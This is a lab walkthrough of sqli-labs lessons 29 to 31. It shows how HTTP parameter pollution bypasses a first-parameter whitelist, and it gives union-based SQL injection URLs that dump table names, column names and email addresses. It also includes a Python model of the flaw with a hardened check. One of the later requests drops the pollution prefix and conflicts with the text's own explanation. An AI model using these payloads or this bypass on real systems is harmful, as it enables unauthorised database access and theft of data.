SQLi Labs Lesson29 & Lesson30 & Lesson31
2016-08-28 09:26
Lesson - 29
GET - Error Based - IMPIDENCE MISMATCH - Having a WAF in front of Web Application
First, the welcome page: request ?id=1, and the result is as shown in the figure:
Request ?id=1' and the page is redirected; the result is as shown in the figure:
Trying a double quote and parentheses gives the same result: both are redirected.
Look at the back-end source code.
The back-end whitelist function:
```php
function whitelist($input) {
    // Only an all-digit value passes; anything else is redirected away
    $match = preg_match("/^\d+$/", $input);
    if ($match) {
        //echo "you are good";
        //return $match;
    } else {
        header('Location: hacked.php');
        //echo "you are bad";
    }
}
```
When $input is not purely numeric, the request is redirected to another page (hacked.php).
The back-end java_implimentation function:
```php
function java_implimentation($query_string) {
    $q_s = $query_string;
    $qs_array = explode("&", $q_s);
    foreach ($qs_array as $key => $value) {
        // Prefix check only: any chunk whose first two characters are "id" matches
        $val = substr($value, 0, 2);
        if ($val == "id") {
            $id_value = substr($value, 3, 30);
            return $id_value;
            echo "<br>";  // unreachable after return (kept as in the lab source)
            break;
        }
    }
}
```
This function splits query_string on '&'.
If some chunk's first two characters are "id", it returns substr(3, 30) of that chunk, i.e. the first matching parameter wins.
The back-end handling of query_string:
```php
$qs = $_SERVER['QUERY_STRING'];
$hint = $qs;
$id1 = java_implimentation($qs);   // value checked by the whitelist
$id = $_GET['id'];                 // value actually used in the query
whitelist($id1);
$sql = "SELECT * FROM users WHERE id='$id' LIMIT 0,1";
```
Note that the $id used in the final SQL statement is still the id parameter we supplied in the URL via $_GET,
while the value the whitelist checks is $id1.
How PHP/Apache handles several parameters with the same name, for example:
```
GET /foo?id=1&id=2
$id = $_GET['id'];
```
Result: $id = 2 (the last occurrence wins).
On HTTP Parameter Pollution, see AppsecEU09_CarettoniDiPaola_v0.8.pdf.
Construct the following query_string to bypass the WAF:
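The mismatch above is easiest to see with both parsers side by side. The following Python is an added example, not code from the sqli-labs project: it models java_implimentation() (first "id" chunk wins) and PHP's $_GET (last "id" wins), reproduces the whitelist decision, and shows a hardened check that validates the value the query will actually use and refuses duplicate keys. URL decoding is left out for brevity, and the sample query string is constructed from this lesson.

```python
import re

# Added example (not sqli-labs code). URL decoding is omitted for brevity.

def waf_first_id(query_string):
    """Mimic java_implimentation(): value of the first '&'-chunk whose first two
    characters are 'id' (prefix match), taken as substr($value, 3, 30)."""
    for chunk in query_string.split("&"):
        if chunk[:2] == "id":
            return chunk[3:33]
    return None

def php_get_id(query_string):
    """Mimic $_GET['id']: when a key repeats, PHP keeps the last value."""
    value = None
    for chunk in query_string.split("&"):
        key, _, val = chunk.partition("=")
        if key == "id":
            value = val
    return value

def is_numeric(value):
    r"""The whitelist() test /^\d+$/. fullmatch is stricter than PHP's '$',
    which also accepts a single trailing newline."""
    return value is not None and re.fullmatch(r"\d+", value, re.ASCII) is not None

def waf_passes(query_string):
    """What the lesson's whitelist() decides: it only ever sees the first id."""
    return is_numeric(waf_first_id(query_string))

def hardened_check(query_string):
    """Validate the value the query will actually use, and refuse repeated
    'id' keys so the two parsers can never disagree."""
    keys = [chunk.partition("=")[0] for chunk in query_string.split("&")]
    if keys.count("id") != 1:
        return False
    return is_numeric(php_get_id(query_string))

if __name__ == "__main__":
    qs = "id=1&id=0' union select 1,2,3--+"  # constructed sample from this lesson
    print("WAF sees:", waf_first_id(qs), "| query uses:", php_get_id(qs))
    print("whitelist passes:", waf_passes(qs), "| hardened:", hardened_check(qs))
```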
Request ?id=1&id=0' union select 1,2,3--+
Request ?id=1&id=0' union select 1,(select table_name from information_schema.tables where table_schema = database() limit 0,1),3 --+
This retrieves the first table of the current database.
Request ?id=1&id=0' union select 1,(select column_name from information_schema.columns where table_schema = database() and table_name = 'emails' limit 0,1),(select column_name from information_schema.columns where table_schema = database() and table_name = 'emails' limit 1,1) --+
This retrieves the first and second columns of the emails table.
Request ?id=0' union select 1,(select email_id from emails limit 1,1),0--+
This retrieves an email address.
Lesson 30
GET - Blind - IMPIDENCE - MISMACTH - Having a WAF in front of web application
Request ?id=1&id=0" union select 1,2,3--+
Lesson 31
GET - Blind - IMPIDENCE - MISMACTH - Having a WAF in front of web application
Request ?id=1&id=0") union select 1,2,3 --+